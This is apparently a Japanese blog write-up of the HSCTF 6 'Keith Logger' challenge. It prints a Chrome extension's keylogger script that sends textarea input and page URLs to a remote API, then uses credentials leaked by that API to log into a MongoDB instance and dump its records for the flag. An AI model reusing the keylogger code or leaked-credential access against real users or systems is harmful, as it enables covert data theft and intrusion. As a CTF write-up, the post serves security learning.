こんとろーるしーこんとろーるぶい

週末にカチャカチャッターン!したことを貼り付けていくブログ

HSCTF 6 Writeup - Keith Logger

CTF

Question

Keith is up to some evil stuff! Can you figure out what he's doing and find the flag?

Solution

添付ファイルは拡張子crxのChrome Extension。
7zipで中身を覗くとcontent.jsがある。

var timeout_textarea;
var xhr_textarea;

$("textarea").on("keyup", function() {
  if (timeout_textarea) {
    clearTimeout(timeout_textarea);
  }

  if (xhr_textarea) {
    xhr_textarea.abort();
  }

  timeout_textarea = setTimeout(function() {
    var xhr = new XMLHttpRequest();
    /*
    xhr.open(
      "GET",
      "https://keith-logger.web.chal.hsctf.com/api/record?text=" +
        encodeURIComponent($("textarea").val()) +
        "&url=" + encodeURIComponent(window.location.href),
      true
    );*/


    // send a request to admin whenever something is logged, not needed anymore after testing
    /*
    xhr.open(
      "GET",
      "https://keith-logger.web.chal.hsctf.com/api/admin",
      true
    );*/

    xhr.send();
  }, 2000);
});

URLが出てきたのでアクセスしてみる。

root@kali:~# curl "https://keith-logger.web.chal.hsctf.com/api/record?text=aaa&url=bbb"
{'text': 'aaa', 'url': 'bbb', 'time': '13:47:05.441928'}


root@kali:~# curl "https://keith-logger.web.chal.hsctf.com/api/admin"
didn't have time to implement this page yet. use admin:keithkeithkeith@keith-logger-mongodb.web.chal.hsctf.com:27017 for now

更にURLが出てきた。

root@kali:~# curl "keith-logger-mongodb.web.chal.hsctf.com:27017"
It looks like you are trying to access MongoDB over HTTP on the native driver port.

mongoDBで接続してみるとよさそうだ。

mongoコマンドが必要。
Kali Linuxにインストールする場合、以下の手順でインストールできる。

docs.mongodb.com

接続して、データベース、コレクションを表示する。

root@kali:~# mongo keith-logger-mongodb.web.chal.hsctf.com:27017 -u admin -p keithkeithkeith --authenticationDatabase admin
MongoDB shell version v4.0.10
connecting to: mongodb://keith-logger-mongodb.web.chal.hsctf.com:27017/test?authSource=admin&gssapiServiceName=mongodb
Implicit session: session { "id" : UUID("ea9498a4-faa7-4a40-9613-9fc71f6c94f2") }
MongoDB server version: 4.0.10

> show dbs
database  0.000GB

> use database
switched to db database

> show collections
collection

databaseというデータベースに、collectionというコレクションがあるらしい。

> db.collection.find()
{ "_id" : ObjectId("5cf0512d464d9fe1d9915fbd"), "text" : "are kitties cool", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:54:53.925045" }
{ "_id" : ObjectId("5cf051a95501f2901a915fbd"), "text" : "because i think they are", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:56:57.974856" }
{ "_id" : ObjectId("5cf051b3464d9fe1d9915fbe"), "text" : "meow! :3", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:57:07.295378" }
{ "_id" : ObjectId("5cf0520b464d9fe1d9915fbf"), "text" : "meow! :3", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:58:35.030635" }
{ "_id" : ObjectId("5cf05212464d9fe1d9915fc0"), "text" : "if you're looking for the flag", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:58:42.170470" }
{ "_id" : ObjectId("5cf0521b5501f2901a915fbe"), "text" : "it's hsctf{watch_out_for_keyloggers}", "url" : "https://keith-logger.web.chal.hsctf.com/", "time" : "21:58:51.359556" }

フラグゲット
hsctf{watch_out_for_keyloggers}